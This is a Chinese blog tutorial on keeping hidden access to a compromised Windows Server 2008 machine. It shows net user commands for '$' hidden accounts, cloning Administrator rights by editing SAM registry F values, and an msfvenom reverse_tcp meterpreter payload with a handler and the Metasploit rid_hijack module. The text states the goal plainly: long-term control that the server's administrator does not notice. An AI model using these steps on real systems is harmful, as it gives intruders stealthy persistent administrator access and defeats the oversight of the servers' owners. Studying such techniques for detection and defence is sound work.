本文主要记录了当我们拿下一台服务器后要进行权限维持,如何能够隐藏我们所创建的账号不备管理员所知晓,达到长期控制目的。其中有不正确的地方欢迎大佬评论指正。

文章目录

  • 前言
    • 以windows2008为例:
  • 一、账号克隆
    • 1、账号创建
    • 2、账号禁用
    • 3、打开注册表
    • 4、进行账号克隆
    • 5、通过新用户登录
  • 二、RID劫持
    • 1.通过MSF生成payload返回会话
    • 2、通过会话创建账号
    • 3、使用rid_hijack进行RID劫持

前言

当我们拿下一台服务器后,直接创建新用户不做任何改变的话,很容易被管理员所察觉,

以windows2008为例:

1、创建隐藏账户

net user ph$ 123@com /add

2、直接使用命令无法查看到新建用户

net user

3、但是我们在用户和组管理中可以看到该用户情况,但是这并不是主要的,如果我们通过该用户进行登录该计算机,计算机会在C:\Users下创建一个以该用户名所创建的文件夹,这个太容易导致管理员发现有新建未知用户了/font>


4、下面的两种方法可以很好的避免在Users文件夹下创建新的目录情况

一、账号克隆

本方法适用于在本地进行操作

1、账号创建

net user ph1$ 123.com /add

2、账号禁用

为了有更好的演示效果,我将上面所创建的ph1$账户进行禁用

开始 – 管理工具 – 计算机管理 – 用户与组 – 用户

3、打开注册表

win + r键 – 输入:regedit

找到如下路径,打开第二个SAM文件时,我们一般没有权限,所以选中该文件然后右键,选中权限,打开后将administrator权限赋值为:完全控制。结束后点击确定,这个时候再在该页面顶部选择查看 – 刷新 ,这个时候设置才会生效。

HKEY_LOCAL_MACHINE /SAM /SAM /Domains /Users /name

4、进行账号克隆

通过步骤3中我们所进入的文件夹下面,找到你要克隆的账号,这里我们需要克隆Administrator账号,就选择该账号的文件夹并打开记住其类型值,我的这里是:1f4,然后根据类型值在Users文件夹下面找到对应类型值的目录

打开上诉找到的目录并打开里面名称为F的文件,复制里面的内容

根据上述的方法,找到我们想要替换的用户,将我们复制的内容替换其F值里面的内容,我这里则是要替换ph1$账户的F值内容

5、通过新用户登录

上述步骤完成之后,我们使用ph1$这个新用户登录,查看服务器的变化


通过上述我们可以知道,该账号的权限为Administrator权限,同时打开用户管理时显示为禁用状态,在User下面不会创建新的以用户名为名字的目录,这样可以起一个很好的掩饰作用。

二、RID劫持

账号克隆虽然可以对我们所创建的用户进行一定的隐藏,但是它任然需要登录到本地才可以,这个在实战过程中有很大的局限性,所以我们可以通过RID劫持的方法来创建新的用户,让我们可以远程创建用户,同时能够起到隐藏作用

1.通过MSF生成payload返回会话

这里为了方便演示我直接在本地生成然后上传,在实战过程中建议使用冰蝎,能够很方便的给我们返回msf会话

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.111.24  lport=12348 -f exe > s4.exe

payload生成好后,上传到服务器,然后打开msf,进行监听会话

use exploit/multi/handlerset payload  windows/meterpreter/reverse_tcpset lhost 192.168.111.22set lport 12348run

在win2008服务器上运行生成的木马文件,msf可以接收返回的会话就可以进行下一步操作了

2、通过会话创建账号

在msf的会话窗口,输入shell,就可以使用DOS命令来创建账号了,具体步骤如下:

1、shell
2、net user qq3$ 123.com /add

用户创建成功之后返回,将当前session放在后台运行,即输入:background,并记住当前sesson编号为1,也可以通过输入sessions命令来查看session编号

3、使用rid_hijack进行RID劫持

通过下述步骤配置相应的参数:

1、search rid_h
2、use 0       //即使用:post/windows/manage/rid_hijack
3、options    //查看要填写的内容
4、set GETSySTEM true
5、set GUEST_ACCOUNT false
6、set PASSWORD 123.com
7、set SESSION 1
8、set USERNAME qq3$
9、run

运行之后返回如下表示劫持成功

为了进一步测试效果我们先选择远程连接该服务器,应该再劫持前就尝试远程连接一下的,一般我们是没有权限去连接的,由于我往了所以这一步我就省略了,这里直接来查看劫持之后的远程连接效果:

成功连接同时权限也是administrator权限,同时在Users文件夹下面没有创建新的用户目录,在本地登录与在远程登录效果相同,这里我就不截图进行证明了,各位有兴趣的小伙伴可以自己去尝试
同时该方法我认为不仅可以进行权限维持,当我们在渗透测试过程中,我们拿到高权限用户但是没有密码,应该也可以通过这种方法克隆一个相同权限的用户,然后也就可以进行远程登录,帮助我们进一步测试。这个我暂时没有实测过,有兴趣的小伙伴可以进行相关实验。

针对RID劫持这里有一篇文章将的还不错:
RID劫持细讲

Windows权限维持1:账号隐藏相关推荐

  1. Windows server 2008文件服务器之一隐藏用户无权限访问的共享文件夹

    Windows server 2008文件服务器之一隐藏用户无权限访问的共享文件夹 话说在windows server 2003 SP1可以从微软获得一个插件得到这样一个实用的功能:让用户没有权限访问 ...

  2. Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持

    文中主要讲解Windows权限维持中的小技巧,通过了解掌握建立影子账号.powershell配置后门.Monitor权限维持等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师 ...

  3. linux设置账号权限设置,Linux账号管理与ACL权限设置

    1:UID和GID 用户ID:在/etc/passwd中 群组ID:在/etc/group中 2:有效群组与初始群组 初始群组:/etc/passwd文件里面的GID 有效群组: groups #查看 ...

  4. windows权限维持方法详解

    权限维持 在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问. 权限持久化(权限维持)技术就是包括任何可以被测试 ...

  5. Windows权限维持之php不死马、映像劫持、策略组脚本

    文中主要讲解Windows权限维持中的小技巧,通过了解掌握php不死马.映像劫持.策略组脚本等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若 ...

  6. windows权限管理

    文章目录 windows权限管理 UAC 显示UAC按钮 遍历权限 重要的结构体 提权 windows权限管理 权限管理是通过账户权限实现的.用户一登录,就与os建立会话,分配权限. 权限在windo ...

  7. Windows批处理创建、删除隐藏账户,实现远程登录

    Windows批处理创建.删除隐藏账户脚本 一.手动操作 新建一个用户 利用命令行直接输或者做成批处理程序具体内容如下: @echo offnet user godyang$ 123456 /addn ...

  8. Windows权限提升—溢出提权

    Windows权限提升-溢出提权 1. 权限提升介绍 1.1. 权限说明 1.2. 权限提升后操作 1.3. 权限提升的意义 1.4. 权限提升整体流程 1.5. 权限获取方式 1.5.1. 特殊类型 ...

  9. Windows权限提升—令牌窃取、UAC提权、进程注入等提权

    Windows权限提升-令牌窃取.UNC提权.进程注入等提权 1. 前言 2. at本地命令提权 2.1. 适用范围 2.2. 命令使用 2.3. 操作步骤 2.3.1. 模拟提权 2.3.2. at ...

  10. Windows权限设置详解

    Windows权限设置详解 随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式***越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁.只让80端口对外开放的WEB ...

最新文章

  1. 深度学习--TensorFlow(4)BP神经网络(损失函数、梯度下降、常用激活函数、梯度消失梯度爆炸)
  2. 日读论文100+,AI都替代不了!辞去医药研发总监后,她成为了一名全职学术警察...
  3. matlab中clc,close,close all,clear,clear all作用区别
  4. Java.util包中常用的类
  5. python 带参数的多重继承
  6. mysql+主从复制重做_XtraBackup实现MySQL不停机重做主从复制
  7. Python安装pyinstaller模块的错误:NO module name “setuptools“
  8. angularjs指令参数transclude
  9. ImportError: No module named MySQLdb
  10. Shader、Draw Call和渲染管线(Rendering Pipeline)
  11. 《游戏设计艺术(第二版)》第十章个人学习
  12. Java练手项目-王者荣耀项目源码分享!
  13. 自建dnspod解析服务器,利用DNSPOD配置智能解析双线服务器
  14. 【peoplesoft】Integration Gateway - General Error (158,10201)错误
  15. js数组方法及其返回值(简单用法)
  16. android短信接收处理和发送
  17. VOSviewer进行中文和英文文献分析
  18. 面试了10几家软件公司测试岗位,做的面试题大盘点,重点大合集
  19. 博士毕业年龄如何计算机,紧缺专业博士因年龄问题,毕业等于失业(转载)
  20. java协议标准与规范

热门文章

  1. Required request body is missing:ParameterException解决方法
  2. android距离传感器的应用
  3. echarts使用复选框样式legend控制显隐
  4. bzoj 2827 千山鸟飞绝(treap)
  5. 股票什么时候买入什么时候卖出适合?
  6. python打开记事本并输入内容_打开记事本输入文字
  7. 收到offer不想去,如何优雅拒绝?
  8. PNG,JPEG,BMP,JIF图片格式详解及其对比
  9. docker常用操作(二) docker安装mysql5.7
  10. Round Roundup